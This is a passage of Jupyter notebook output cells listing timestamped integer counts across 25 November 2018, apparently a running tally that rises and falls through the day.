"['2018-11-25 07:52:57.347196', 5]\n",
"['2018-11-25 07:56:47.963756', 6]\n",
"['2018-11-25 07:56:54.796640', 5]\n",
"['2018-11-25 07:57:05.277805', 4]\n",
"['2018-11-25 07:59:32.852075', 3]\n",
"['2018-11-25 08:03:02.968397', 2]\n",
"['2018-11-25 08:08:50.014129', 1]\n",
"['2018-11-25 08:34:32.898486', 2]\n",
"['2018-11-25 08:35:00.341150', 3]\n",
"['2018-11-25 08:39:12.884648', 2]\n",
"['2018-11-25 08:39:22.718266', 3]\n",
"['2018-11-25 08:40:16.706398', 4]\n",
"['2018-11-25 08:41:37.169125', 5]\n",
"['2018-11-25 08:42:43.546378', 6]\n",
"['2018-11-25 08:45:00.043837', 7]\n",
"['2018-11-25 08:45:02.188619', 8]\n",
"['2018-11-25 08:45:30.905380', 9]\n",
"['2018-11-25 08:45:44.944599', 8]\n",
"['2018-11-25 08:46:17.439059', 9]\n",
"['2018-11-25 08:46:31.031381', 8]\n",
"['2018-11-25 08:46:49.390339', 7]\n",
"['2018-11-25 08:48:48.664279', 8]\n",
"['2018-11-25 08:49:21.791084', 6]\n",
"['2018-11-25 08:50:18.511689', 5]\n",
"['2018-11-25 08:51:39.195132', 6]\n",
"['2018-11-25 08:52:18.992592', 7]\n",
"['2018-11-25 08:52:55.577198', 8]\n",
"['2018-11-25 08:52:56.269704', 9]\n",
"['2018-11-25 08:53:22.943923', 8]\n",
"['2018-11-25 08:54:26.409531', 9]\n",
"['2018-11-25 08:56:46.645376', 6]\n",
"['2018-11-25 08:57:49.366362', 4]\n",
"['2018-11-25 08:58:50.387928', 3]\n",
"['2018-11-25 08:59:52.348557', 2]\n",
"['2018-11-25 09:18:26.382250', 1]\n",
"['2018-11-25 09:20:41.769228', 2]\n",
"['2018-11-25 09:21:22.280338', 3]\n",
"['2018-11-25 09:26:41.374416', 1]\n",
"['2018-11-25 09:28:17.447747', 2]\n",
"['2018-11-25 09:30:01.918288', 3]\n",
"['2018-11-25 09:30:06.672338', 4]\n",
"['2018-11-25 09:34:44.042021', 2]\n",
"['2018-11-25 09:34:45.493592', 3]\n",
"['2018-11-25 09:34:51.375403', 4]\n",
"['2018-11-25 09:34:56.133487', 5]\n",
"['2018-11-25 09:35:05.045445', 6]\n",
"['2018-11-25 09:37:14.327578', 5]\n",
"['2018-11-25 09:39:07.369075', 4]\n",
"['2018-11-25 09:45:05.391967', 5]\n",
"['2018-11-25 09:50:01.742970', 4]\n",
"['2018-11-25 09:50:03.039910', 5]\n",
"['2018-11-25 09:58:07.765643', 4]\n",
"['2018-11-25 09:59:25.704475', 5]\n",
"['2018-11-25 10:00:48.289289', 6]\n",
"['2018-11-25 10:07:35.874511', 7]\n",
"['2018-11-25 10:13:57.663392', 8]\n",
"['2018-11-25 10:14:27.226927', 7]\n",
"['2018-11-25 10:17:32.731868', 6]\n",
"['2018-11-25 10:18:07.858477', 5]\n",
"['2018-11-25 10:20:07.984000', 4]\n",
"['2018-11-25 10:20:33.123135', 2]\n",
"['2018-11-25 10:21:41.908722', 3]\n",
"['2018-11-25 10:27:32.569106', 4]\n",
"['2018-11-25 10:30:42.396791', 5]\n",
"['2018-11-25 10:32:15.956130', 3]\n",
"['2018-11-25 10:36:00.941760', 2]\n",
"['2018-11-25 10:36:53.388850', 3]\n",
"['2018-11-25 10:41:35.316521', 4]\n",
"['2018-11-25 10:41:45.448522', 5]\n",
"['2018-11-25 10:42:02.101159', 6]\n",
"['2018-11-25 10:42:52.712283', 7]\n",
"['2018-11-25 10:43:07.964115', 6]\n",
"['2018-11-25 10:43:44.506053', 7]\n",
"['2018-11-25 10:44:28.439036', 8]\n",
"['2018-11-25 10:47:07.011542', 7]\n",
"['2018-11-25 10:48:11.164602', 8]\n",
"['2018-11-25 10:48:14.728267', 9]\n",
"['2018-11-25 10:48:26.034101', 10]\n",
"['2018-11-25 10:49:03.445785', 11]\n",
"['2018-11-25 10:49:27.450552', 12]\n",
"['2018-11-25 10:49:29.067791', 13]\n",
"['2018-11-25 10:49:58.234394', 12]\n",
"['2018-11-25 10:51:01.945072', 13]\n",
"['2018-11-25 10:51:09.827361', 14]\n",
"['2018-11-25 10:51:33.389472', 13]\n",
"['2018-11-25 10:51:57.833638', 14]\n",
"['2018-11-25 10:52:15.651953', 15]\n",
"['2018-11-25 10:52:23.485087', 14]\n",
"['2018-11-25 10:52:26.699937', 13]\n",
"['2018-11-25 10:52:42.621814', 14]\n",
"['2018-11-25 10:53:18.459457', 15]\n",
"['2018-11-25 10:53:28.183299', 16]\n",
"['2018-11-25 10:53:28.993116', 17]\n",
"['2018-11-25 10:54:00.792961', 16]\n",
"['2018-11-25 10:54:21.304610', 15]\n",
"['2018-11-25 10:54:44.818868', 16]\n",
"['2018-11-25 10:55:14.890939', 14]\n",
"['2018-11-25 10:55:23.679103', 15]\n",
"['2018-11-25 10:55:42.319511', 14]\n",
"['2018-11-25 10:57:00.933844', 13]\n",
"['2018-11-25 10:57:18.473992', 11]\n",
"['2018-11-25 10:57:43.484905', 9]\n",
"['2018-11-25 10:58:07.632907', 8]\n",
"['2018-11-25 10:58:19.008244', 9]\n",
"['2018-11-25 10:58:59.242465', 10]\n",
"['2018-11-25 10:59:23.090578', 11]\n",
"['2018-11-25 10:59:25.347272', 12]\n",
"['2018-11-25 10:59:45.626499', 13]\n",
"['2018-11-25 11:00:05.792077', 12]\n",
"['2018-11-25 11:00:17.446170', 13]\n",
"['2018-11-25 11:02:30.702371', 12]\n",
"['2018-11-25 11:02:30.815452', 13]\n",
"['2018-11-25 11:02:51.712587', 12]\n",
"['2018-11-25 11:03:01.150327', 13]\n",
"['2018-11-25 11:03:11.656166', 14]\n",
"['2018-11-25 11:03:31.186069', 12]\n",
"['2018-11-25 11:04:00.025232', 11]\n",
"['2018-11-25 11:04:49.177225', 10]\n",
"['2018-11-25 11:05:11.704649', 11]\n",
"['2018-11-25 11:05:13.814332', 12]\n",
"['2018-11-25 11:05:17.314552', 13]\n",
"['2018-11-25 11:05:23.437140', 12]\n",
"['2018-11-25 11:06:01.029553', 13]\n",
"['2018-11-25 11:07:32.055148', 14]\n",
"['2018-11-25 11:08:55.364150', 15]\n",
"['2018-11-25 11:09:15.080968', 14]\n",
"['2018-11-25 11:09:37.866176', 15]\n",
"['2018-11-25 11:09:59.919807', 16]\n",
"['2018-11-25 11:10:00.746232', 17]\n",
"['2018-11-25 11:10:50.353327', 16]\n",
"['2018-11-25 11:11:02.153453', 15]\n",
"['2018-11-25 11:11:39.492198', 14]\n",
"['2018-11-25 11:12:13.833293', 13]\n",
"['2018-11-25 11:12:42.578454', 14]\n",
"['2018-11-25 11:12:55.962067', 11]\n",
"['2018-11-25 11:13:07.243247', 10]\n",
"['2018-11-25 11:13:57.508680', 8]\n",
"['2018-11-25 11:14:28.476564', 5]\n",
"['2018-11-25 11:14:52.226580', 6]\n",
"['2018-11-25 11:15:01.536435', 7]\n",
"['2018-11-25 11:15:31.718793', 8]\n",
"['2018-11-25 11:16:03.909954', 9]\n",
"['2018-11-25 11:16:44.986880', 10]\n",
"['2018-11-25 11:17:42.566183', 9]\n",
"['2018-11-25 11:17:43.134954', 10]\n",
"['2018-11-25 11:19:17.451222', 9]\n",
"['2018-11-25 11:20:23.877480', 8]\n",
"['2018-11-25 11:21:23.878740', 4]\n",
"['2018-11-25 11:21:26.849103', 5]\n",
"['2018-11-25 11:21:49.580800', 3]\n",
"['2018-11-25 11:22:44.454137', 4]\n",
"['2018-11-25 11:23:23.880673', 3]\n",
"['2018-11-25 11:25:06.861738', 4]\n",
"['2018-11-25 11:25:55.949645', 5]\n",
"['2018-11-25 11:26:01.210391', 6]\n",
"['2018-11-25 11:26:23.885493', 5]\n",
"['2018-11-25 11:26:31.240201', 6]\n",
"['2018-11-25 11:27:00.684559', 7]\n",
"['2018-11-25 11:27:18.253870', 8]\n",
"['2018-11-25 11:28:29.194496', 9]\n",
"['2018-11-25 11:28:46.397829', 8]\n",
"['2018-11-25 11:29:12.916456', 7]\n",
"['2018-11-25 11:30:24.844719', 6]\n",
"['2018-11-25 11:30:58.256423', 7]\n",
"['2018-11-25 11:31:31.028457', 8]\n",
"['2018-11-25 11:32:49.082457', 9]\n",
"['2018-11-25 11:32:55.493677', 8]\n",
"['2018-11-25 11:35:28.166997', 9]\n",
"['2018-11-25 11:36:00.135889', 8]\n",
"['2018-11-25 11:38:26.081087', 9]\n",
"['2018-11-25 11:39:08.469657', 10]\n",
"['2018-11-25 11:39:31.428192', 9]\n",
"['2018-11-25 11:41:21.543172', 8]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 11:43:23.410638', 6]\n",
"['2018-11-25 11:45:26.440813', 1]\n",
"['2018-11-25 12:14:24.131951', 2]\n",
"['2018-11-25 12:14:25.762629', 3]\n",
"['2018-11-25 12:15:45.918042', 4]\n",
"['2018-11-25 12:16:53.356123', 5]\n",
"['2018-11-25 12:17:00.949304', 6]\n",
"['2018-11-25 12:17:09.944511', 7]\n",
"['2018-11-25 12:17:19.103393', 8]\n",
"['2018-11-25 12:19:25.953866', 7]\n",
"['2018-11-25 12:21:11.022819', 5]\n",
"['2018-11-25 12:21:26.039693', 4]\n",
"['2018-11-25 12:21:32.694293', 5]\n",
"['2018-11-25 12:24:06.247658', 6]\n",
"['2018-11-25 12:24:17.439719', 7]\n",
"['2018-11-25 12:25:40.128973', 8]\n",
"['2018-11-25 12:28:24.920919', 7]\n",
"['2018-11-25 12:28:27.754362', 8]\n",
"['2018-11-25 12:28:31.899646', 9]\n",
"['2018-11-25 12:28:32.421224', 10]\n",
"['2018-11-25 12:28:33.395223', 11]\n",
"['2018-11-25 12:28:59.061870', 12]\n",
"['2018-11-25 12:30:06.131621', 13]\n",
"['2018-11-25 12:30:24.799248', 12]\n",
"['2018-11-25 12:31:14.173647', 11]\n",
"['2018-11-25 12:32:09.406361', 12]\n",
"['2018-11-25 12:33:09.186929', 13]\n",
"['2018-11-25 12:33:13.416636', 14]\n",
"['2018-11-25 12:33:18.414165', 15]\n",
"['2018-11-25 12:33:20.995214', 14]\n",
"['2018-11-25 12:33:39.499572', 13]\n",
"['2018-11-25 12:33:43.725309', 12]\n",
"['2018-11-25 12:33:52.963166', 11]\n",
"['2018-11-25 12:35:31.489293', 12]\n",
"['2018-11-25 12:35:51.436058', 11]\n",
"['2018-11-25 12:35:54.251671', 12]\n",
"['2018-11-25 12:36:01.060544', 13]\n",
"['2018-11-25 12:37:43.330634', 12]\n",
"['2018-11-25 12:37:50.471581', 11]\n",
"['2018-11-25 12:37:57.935499', 10]\n",
"['2018-11-25 12:41:01.068033', 5]\n",
"['2018-11-25 12:41:44.438613', 4]\n",
"['2018-11-25 12:46:14.595973', 5]\n",
"['2018-11-25 12:48:26.580181', 6]\n",
"['2018-11-25 12:49:51.754025', 7]\n",
"['2018-11-25 12:50:26.673721', 6]\n",
"['2018-11-25 12:52:15.601992', 5]\n",
"['2018-11-25 12:53:11.572659', 4]\n",
"['2018-11-25 12:54:15.142604', 3]\n",
"['2018-11-25 12:55:15.191631', 2]\n",
"['2018-11-25 12:57:55.214889', 1]\n",
"['2018-11-25 12:59:13.291185', 2]\n",
"['2018-11-25 13:01:05.447415', 3]\n",
"['2018-11-25 13:02:25.830605', 2]\n",
"['2018-11-25 13:02:26.320594', 3]\n",
"['2018-11-25 13:02:51.664763', 4]\n",
"['2018-11-25 13:03:20.029380', 3]\n",
"['2018-11-25 13:08:41.546078', 2]\n",
"['2018-11-25 13:10:42.645605', 1]\n",
"['2018-11-25 13:10:57.865892', 2]\n",
"['2018-11-25 13:12:24.613311', 3]\n",
"['2018-11-25 13:13:12.030885', 4]\n",
"['2018-11-25 13:13:17.671550', 5]\n",
"['2018-11-25 13:14:38.838703', 6]\n",
"['2018-11-25 13:14:42.173605', 7]\n",
"['2018-11-25 13:14:43.818193', 8]\n",
"['2018-11-25 13:15:21.490890', 9]\n",
"['2018-11-25 13:16:57.964952', 8]\n",
"['2018-11-25 13:17:26.464963', 7]\n",
"['2018-11-25 13:18:02.606395', 8]\n",
"['2018-11-25 13:18:31.446720', 9]\n",
"['2018-11-25 13:19:08.253139', 10]\n",
"['2018-11-25 13:19:15.262463', 9]\n",
"['2018-11-25 13:19:26.469888', 8]\n",
"['2018-11-25 13:20:11.691808', 9]\n",
"['2018-11-25 13:21:37.495923', 10]\n",
"['2018-11-25 13:21:54.915392', 11]\n",
"['2018-11-25 13:22:26.473849', 10]\n",
"['2018-11-25 13:22:38.356308', 9]\n",
"['2018-11-25 13:23:26.477395', 7]\n",
"['2018-11-25 13:23:41.297898', 8]\n",
"['2018-11-25 13:25:03.472349', 9]\n",
"['2018-11-25 13:25:14.461921', 8]\n",
"['2018-11-25 13:25:25.950413', 9]\n",
"['2018-11-25 13:25:26.021306', 10]\n",
"['2018-11-25 13:25:27.590810', 11]\n",
"['2018-11-25 13:25:36.527660', 10]\n",
"['2018-11-25 13:26:31.339764', 9]\n",
"['2018-11-25 13:27:47.077607', 8]\n",
"['2018-11-25 13:28:38.273837', 9]\n",
"['2018-11-25 13:29:01.270908', 10]\n",
"['2018-11-25 13:30:00.399856', 9]\n",
"['2018-11-25 13:30:14.446551', 10]\n",
"['2018-11-25 13:30:39.076836', 11]\n",
"['2018-11-25 13:30:59.506309', 10]\n",
"['2018-11-25 13:31:21.885751', 9]\n",
"['2018-11-25 13:32:22.781714', 10]\n",
"['2018-11-25 13:32:26.870705', 11]\n",
"['2018-11-25 13:32:34.710288', 12]\n",
"['2018-11-25 13:32:35.243333', 13]\n",
"['2018-11-25 13:32:50.092780', 12]\n",
"['2018-11-25 13:34:21.246831', 13]\n",
"['2018-11-25 13:34:35.264913', 14]\n",
"['2018-11-25 13:34:36.201106', 15]\n",
"['2018-11-25 13:34:38.494929', 14]\n",
"['2018-11-25 13:34:47.146720', 13]\n",
"['2018-11-25 13:35:03.455985', 14]\n",
"['2018-11-25 13:35:51.772801', 13]\n",
"['2018-11-25 13:36:03.521434', 12]\n",
"['2018-11-25 13:36:23.138007', 11]\n",
"['2018-11-25 13:36:58.322286', 9]\n",
"['2018-11-25 13:37:15.134244', 10]\n",
"['2018-11-25 13:37:17.591400', 11]\n",
"['2018-11-25 13:37:23.814244', 12]\n",
"['2018-11-25 13:37:31.437321', 13]\n",
"['2018-11-25 13:38:34.175101', 12]\n",
"['2018-11-25 13:38:49.598055', 9]\n",
"['2018-11-25 13:39:41.220979', 10]\n",
"['2018-11-25 13:40:49.313020', 9]\n",
"['2018-11-25 13:41:41.632826', 7]\n",
"['2018-11-25 13:41:47.735560', 6]\n",
"['2018-11-25 13:42:17.862658', 5]\n",
"['2018-11-25 13:43:23.276376', 6]\n",
"['2018-11-25 13:44:01.800405', 5]\n",
"['2018-11-25 13:44:47.993585', 6]\n",
"['2018-11-25 13:45:01.194664', 7]\n",
"['2018-11-25 13:47:30.267136', 6]\n",
"['2018-11-25 13:49:02.616716', 3]\n",
"['2018-11-25 13:53:17.093534', 1]\n",
"['2018-11-25 13:57:45.432636', 2]\n",
"['2018-11-25 13:59:45.731450', 3]\n",
"['2018-11-25 14:00:04.826566', 4]\n",
"['2018-11-25 14:00:04.830414', 5]\n",
"['2018-11-25 14:00:37.775977', 4]\n",
"['2018-11-25 14:02:16.626332', 3]\n",
"['2018-11-25 14:04:22.408934', 4]\n",
"['2018-11-25 14:04:24.823042', 5]\n",
"['2018-11-25 14:05:15.770427', 6]\n",
"['2018-11-25 14:06:25.332995', 4]\n",
"['2018-11-25 14:06:51.324657', 3]\n",
"['2018-11-25 14:07:56.948177', 4]\n",
"['2018-11-25 14:08:43.897030', 5]\n",
"['2018-11-25 14:10:56.990157', 4]\n",
"['2018-11-25 14:11:23.882071', 3]\n",
"['2018-11-25 14:13:27.981048', 2]\n",
"['2018-11-25 14:13:52.680644', 3]\n",
"['2018-11-25 14:14:14.619163', 4]\n",
"['2018-11-25 14:15:19.867859', 5]\n",
"['2018-11-25 14:18:31.933358', 4]\n",
"['2018-11-25 14:19:52.758760', 2]\n",
"['2018-11-25 14:23:49.918699', 3]\n",
"['2018-11-25 14:23:57.877589', 4]\n",
"['2018-11-25 14:24:01.821465', 5]\n",
"['2018-11-25 14:24:22.438036', 6]\n",
"['2018-11-25 14:25:12.797297', 7]\n",
"['2018-11-25 14:25:59.288335', 8]\n",
"['2018-11-25 14:27:22.701759', 9]\n",
"['2018-11-25 14:27:31.258835', 10]\n",
"['2018-11-25 14:28:01.607441', 9]\n",
"['2018-11-25 14:29:07.167684', 7]\n",
"['2018-11-25 14:29:08.802517', 8]\n",
"['2018-11-25 14:29:31.946545', 9]\n",
"['2018-11-25 14:30:07.384237', 10]\n",
"['2018-11-25 14:31:26.833591', 9]\n",
"['2018-11-25 14:31:53.486417', 10]\n",
"['2018-11-25 14:32:26.104739', 11]\n",
"['2018-11-25 14:32:51.553384', 10]\n",
"['2018-11-25 14:33:11.278965', 9]\n",
"['2018-11-25 14:33:46.783357', 10]\n",
"['2018-11-25 14:34:03.670467', 11]\n",
"['2018-11-25 14:34:45.416321', 9]\n",
"['2018-11-25 14:34:45.513624', 10]\n",
"['2018-11-25 14:36:27.366660', 6]\n",
"['2018-11-25 14:36:47.485609', 7]\n",
"['2018-11-25 14:36:49.198520', 8]\n",
"['2018-11-25 14:36:51.737567', 9]\n",
"['2018-11-25 14:38:28.907457', 10]\n",
"['2018-11-25 14:39:16.909673', 7]\n",
"['2018-11-25 14:44:12.938501', 2]\n",
"['2018-11-25 14:50:49.059950', 3]\n",
"['2018-11-25 14:50:57.587750', 4]\n",
"['2018-11-25 14:51:29.422331', 5]\n",
"['2018-11-25 14:51:42.288227', 4]\n",
"['2018-11-25 14:51:49.973951', 5]\n",
"['2018-11-25 14:52:25.676992', 6]\n",
"['2018-11-25 14:52:30.332954', 7]\n",
"['2018-11-25 14:52:36.533451', 8]\n",
"['2018-11-25 14:53:00.320011', 9]\n",
"['2018-11-25 14:53:03.734208', 10]\n",
"['2018-11-25 14:53:18.282007', 11]\n",
"['2018-11-25 14:55:39.865383', 10]\n",
"['2018-11-25 14:57:34.986575', 8]\n",
"['2018-11-25 14:58:29.708403', 9]\n",
"['2018-11-25 14:58:33.435764', 10]\n",
"['2018-11-25 14:59:01.230180', 11]\n",
"['2018-11-25 14:59:46.530931', 12]\n",
"['2018-11-25 15:00:05.176841', 11]\n",
"['2018-11-25 15:00:10.152507', 9]\n",
"['2018-11-25 15:00:43.251233', 10]\n",
"['2018-11-25 15:02:00.734717', 11]\n",
"['2018-11-25 15:02:34.533131', 10]\n",
"['2018-11-25 15:02:50.102012', 11]\n",
"['2018-11-25 15:02:52.687356', 12]\n",
"['2018-11-25 15:02:56.035379', 13]\n",
"['2018-11-25 15:03:00.263944', 12]\n",
"['2018-11-25 15:03:03.610688', 11]\n",
"['2018-11-25 15:03:43.187127', 12]\n",
"['2018-11-25 15:03:48.718929', 11]\n",
"['2018-11-25 15:04:01.313433', 12]\n",
"['2018-11-25 15:06:21.499540', 13]\n",
"['2018-11-25 15:06:26.803845', 14]\n",
"['2018-11-25 15:06:52.930012', 13]\n",
"['2018-11-25 15:07:09.469329', 14]\n",
"['2018-11-25 15:07:31.824964', 11]\n",
"['2018-11-25 15:07:55.103110', 10]\n",
"['2018-11-25 15:07:58.804143', 11]\n",
"['2018-11-25 15:08:28.389805', 10]\n",
"['2018-11-25 15:08:37.354130', 11]\n",
"['2018-11-25 15:09:09.670688', 12]\n",
"['2018-11-25 15:09:23.171895', 13]\n",
"['2018-11-25 15:09:23.332590', 14]\n",
"['2018-11-25 15:09:52.663875', 15]\n",
"['2018-11-25 15:10:25.618024', 16]\n",
"['2018-11-25 15:10:27.919856', 17]\n",
"['2018-11-25 15:10:38.167089', 16]\n",
"['2018-11-25 15:10:59.952326', 17]\n",
"['2018-11-25 15:11:09.954437', 16]\n",
"['2018-11-25 15:11:52.679702', 17]\n",
"['2018-11-25 15:12:09.826265', 18]\n",
"['2018-11-25 15:12:16.702986', 17]\n",
"['2018-11-25 15:12:35.336772', 15]\n",
"['2018-11-25 15:12:38.259327', 14]\n",
"['2018-11-25 15:13:16.407202', 15]\n",
"['2018-11-25 15:13:40.415062', 14]\n",
"['2018-11-25 15:14:15.723438', 15]\n",
"['2018-11-25 15:14:38.336542', 14]\n",
"['2018-11-25 15:15:53.854137', 12]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 15:15:56.091172', 13]\n",
"['2018-11-25 15:16:13.358005', 12]\n",
"['2018-11-25 15:16:55.110871', 13]\n",
"['2018-11-25 15:18:06.938975', 12]\n",
"['2018-11-25 15:18:16.970893', 11]\n",
"['2018-11-25 15:18:26.927317', 10]\n",
"['2018-11-25 15:19:27.176936', 9]\n",
"['2018-11-25 15:19:58.716744', 8]\n",
"['2018-11-25 15:20:03.957883', 7]\n",
"['2018-11-25 15:20:08.998600', 6]\n",
"['2018-11-25 15:20:16.587280', 5]\n",
"['2018-11-25 15:20:29.609959', 6]\n",
"['2018-11-25 15:20:39.618268', 5]\n",
"['2018-11-25 15:20:55.718614', 4]\n",
"['2018-11-25 15:21:19.221791', 5]\n",
"['2018-11-25 15:21:57.123178', 6]\n",
"['2018-11-25 15:23:37.597545', 5]\n",
"['2018-11-25 15:24:08.441176', 6]\n",
"['2018-11-25 15:24:20.433962', 7]\n",
"['2018-11-25 15:25:19.913211', 6]\n",
"['2018-11-25 15:26:29.819910', 7]\n",
"['2018-11-25 15:26:39.984176', 6]\n",
"['2018-11-25 15:27:02.518813', 7]\n",
"['2018-11-25 15:27:06.773893', 8]\n",
"['2018-11-25 15:28:20.544902', 7]\n",
"['2018-11-25 15:29:41.999791', 6]\n",
"['2018-11-25 15:30:27.607201', 7]\n",
"['2018-11-25 15:30:31.247545', 6]\n",
"['2018-11-25 15:31:11.987621', 4]\n",
"['2018-11-25 15:32:02.876524', 5]\n",
"['2018-11-25 15:32:32.052999', 4]\n",
"['2018-11-25 15:33:00.061633', 5]\n",
"['2018-11-25 15:33:41.271251', 6]\n",
"['2018-11-25 15:36:59.678102', 4]\n",
"['2018-11-25 15:37:03.067495', 3]\n",
"['2018-11-25 15:37:05.809917', 4]\n",
"['2018-11-25 15:37:17.222938', 5]\n",
"['2018-11-25 15:37:17.226141', 6]\n",
"['2018-11-25 15:38:58.569760', 4]\n",
"['2018-11-25 15:39:59.735197', 5]\n",
"['2018-11-25 15:40:27.470764', 6]\n",
"['2018-11-25 15:41:17.542235', 5]\n",
"['2018-11-25 15:41:57.563742', 4]\n",
"['2018-11-25 15:43:00.925387', 3]\n",
"['2018-11-25 15:43:37.786807', 4]\n",
"['2018-11-25 15:46:52.734304', 5]\n",
"['2018-11-25 15:46:54.335968', 6]\n",
"['2018-11-25 15:48:27.499059', 7]\n",
"['2018-11-25 15:51:00.592939', 8]\n",
"['2018-11-25 15:51:39.891717', 7]\n",
"['2018-11-25 15:51:46.089905', 8]\n",
"['2018-11-25 15:52:30.988977', 7]\n",
"['2018-11-25 15:53:28.967146', 8]\n",
"['2018-11-25 15:53:53.933552', 9]\n",
"['2018-11-25 15:56:13.918359', 10]\n",
"['2018-11-25 15:56:24.629284', 11]\n",
"['2018-11-25 15:56:28.606639', 12]\n",
"['2018-11-25 15:57:26.209818', 13]\n",
"['2018-11-25 15:57:37.407740', 14]\n",
"['2018-11-25 15:58:03.445372', 13]\n",
"['2018-11-25 15:58:22.503139', 12]\n",
"['2018-11-25 16:00:21.444935', 13]\n",
"['2018-11-25 16:00:29.024359', 12]\n",
"['2018-11-25 16:00:38.242289', 13]\n",
"['2018-11-25 16:01:11.197906', 11]\n",
"['2018-11-25 16:01:11.817947', 12]\n",
"['2018-11-25 16:01:28.782471', 10]\n",
"['2018-11-25 16:02:13.778025', 8]\n",
"['2018-11-25 16:02:38.933574', 7]\n",
"['2018-11-25 16:03:02.921459', 8]\n",
"['2018-11-25 16:03:08.263408', 9]\n",
"['2018-11-25 16:04:16.212905', 10]\n",
"['2018-11-25 16:04:28.999509', 11]\n",
"['2018-11-25 16:04:44.774517', 10]\n",
"['2018-11-25 16:05:26.842546', 9]\n",
"['2018-11-25 16:06:16.855839', 10]\n",
"['2018-11-25 16:06:26.610875', 11]\n",
"['2018-11-25 16:07:27.598391', 9]\n",
"['2018-11-25 16:07:37.767404', 10]\n",
"['2018-11-25 16:07:44.273967', 11]\n",
"['2018-11-25 16:08:29.016146', 10]\n",
"['2018-11-25 16:09:52.007970', 11]\n",
"['2018-11-25 16:09:53.643728', 12]\n",
"['2018-11-25 16:09:55.066625', 13]\n",
"['2018-11-25 16:10:43.026715', 12]\n",
"['2018-11-25 16:10:45.021489', 11]\n",
"['2018-11-25 16:11:30.359477', 10]\n",
"['2018-11-25 16:11:34.425954', 11]\n",
"['2018-11-25 16:12:25.828601', 10]\n",
"['2018-11-25 16:12:34.196546', 9]\n",
"['2018-11-25 16:12:35.118326', 8]\n",
"['2018-11-25 16:12:48.434946', 9]\n",
"['2018-11-25 16:13:21.248517', 10]\n",
"['2018-11-25 16:13:32.710778', 11]\n",
"['2018-11-25 16:13:59.175619', 10]\n",
"['2018-11-25 16:14:18.094376', 9]\n",
"['2018-11-25 16:14:27.287540', 7]\n",
"['2018-11-25 16:16:02.371849', 6]\n",
"['2018-11-25 16:16:59.701954', 5]\n",
"['2018-11-25 16:19:17.689817', 6]\n",
"['2018-11-25 16:20:58.979959', 5]\n",
"['2018-11-25 16:22:25.135894', 4]\n",
"['2018-11-25 16:23:23.765534', 3]\n",
"['2018-11-25 16:23:24.155209', 4]\n",
"['2018-11-25 16:23:37.639315', 3]\n",
"['2018-11-25 16:23:39.841346', 4]\n",
"['2018-11-25 16:26:46.151913', 3]\n",
"['2018-11-25 16:28:08.963842', 1]\n",
"['2018-11-25 16:35:10.108178', 2]\n",
"['2018-11-25 16:43:27.066335', 1]\n",
"['2018-11-25 16:44:27.675009', 2]\n",
"['2018-11-25 16:50:36.247199', 3]\n",
"['2018-11-25 16:51:39.963889', 4]\n",
"['2018-11-25 16:52:00.472855', 5]\n",
"['2018-11-25 16:52:50.660013', 6]\n",
"['2018-11-25 16:53:56.511801', 7]\n",
"['2018-11-25 16:53:58.139738', 8]\n",
"['2018-11-25 16:54:00.779971', 9]\n",
"['2018-11-25 16:55:50.344209', 8]\n",
"['2018-11-25 16:56:59.405894', 9]\n",
"['2018-11-25 16:57:31.012140', 10]\n",
"['2018-11-25 16:57:43.467061', 11]\n",
"['2018-11-25 16:58:02.702863', 10]\n",
"['2018-11-25 16:58:10.707999', 9]\n",
"['2018-11-25 16:59:01.699512', 10]\n",
"['2018-11-25 16:59:46.351205', 11]\n",
"['2018-11-25 17:00:01.820595', 10]\n",
"['2018-11-25 17:00:58.635350', 9]\n",
"['2018-11-25 17:01:43.627891', 8]\n",
"['2018-11-25 17:01:57.802636', 9]\n",
"['2018-11-25 17:03:10.528779', 8]\n",
"['2018-11-25 17:03:44.020020', 9]\n",
"['2018-11-25 17:05:27.316713', 8]\n",
"['2018-11-25 17:06:11.921618', 6]\n",
"['2018-11-25 17:06:55.584892', 7]\n",
"['2018-11-25 17:08:28.559527', 5]\n",
"['2018-11-25 17:09:58.544829', 4]\n",
"['2018-11-25 17:10:25.871967', 5]\n",
"['2018-11-25 17:10:38.052635', 6]\n",
"['2018-11-25 17:11:28.529155', 4]\n",
"['2018-11-25 17:12:28.994795', 3]\n",
"['2018-11-25 17:14:30.164014', 2]\n",
"['2018-11-25 17:15:00.529649', 3]\n",
"['2018-11-25 17:15:26.090640', 4]\n",
"['2018-11-25 17:15:33.652454', 3]\n",
"['2018-11-25 17:16:06.818502', 4]\n",
"['2018-11-25 17:18:51.647058', 3]\n",
"['2018-11-25 17:26:10.768997', 1]\n",
"['2018-11-25 17:27:07.299281', 2]\n",
"['2018-11-25 17:27:07.303435', 3]\n",
"['2018-11-25 17:28:25.791512', 4]\n",
"['2018-11-25 17:30:14.096382', 3]\n",
"['2018-11-25 17:44:00.406806', 1]\n",
"['2018-11-25 17:46:03.818789', 2]\n",
"['2018-11-25 17:50:24.409393', 3]\n",
"['2018-11-25 17:50:36.240190', 4]\n",
"['2018-11-25 17:54:40.613768', 2]\n",
"['2018-11-25 17:56:48.709010', 1]\n",
"['2018-11-25 17:57:20.233877', 2]\n",
"['2018-11-25 17:58:16.144133', 3]\n",
"['2018-11-25 17:58:18.740188', 4]\n",
"['2018-11-25 17:59:32.008201', 5]\n",
"['2018-11-25 18:00:23.986051', 6]\n",
"['2018-11-25 18:00:32.662687', 7]\n",
"['2018-11-25 18:02:36.381708', 6]\n",
"['2018-11-25 18:04:04.192299', 7]\n",
"['2018-11-25 18:04:32.857529', 6]\n",
"['2018-11-25 18:04:35.116662', 5]\n",
"['2018-11-25 18:04:47.291180', 4]\n",
"['2018-11-25 18:05:05.641466', 3]\n",
"['2018-11-25 18:05:10.486677', 4]\n",
"['2018-11-25 18:05:24.469046', 5]\n",
"['2018-11-25 18:06:08.956791', 6]\n",
"['2018-11-25 18:06:33.792925', 7]\n",
"['2018-11-25 18:06:50.879535', 8]\n",
"['2018-11-25 18:07:20.084122', 9]\n",
"['2018-11-25 18:10:45.276195', 7]\n",
"['2018-11-25 18:11:11.946407', 6]\n",
"['2018-11-25 18:11:31.946997', 5]\n",
"['2018-11-25 18:13:07.487004', 4]\n",
"['2018-11-25 18:13:09.125093', 5]\n",
"['2018-11-25 18:13:11.749522', 6]\n",
"['2018-11-25 18:13:15.096080', 7]\n",
"['2018-11-25 18:14:14.281891', 8]\n",
"['2018-11-25 18:14:34.233000', 9]\n",
"['2018-11-25 18:15:18.300198', 10]\n",
"['2018-11-25 18:15:28.825254', 11]\n",
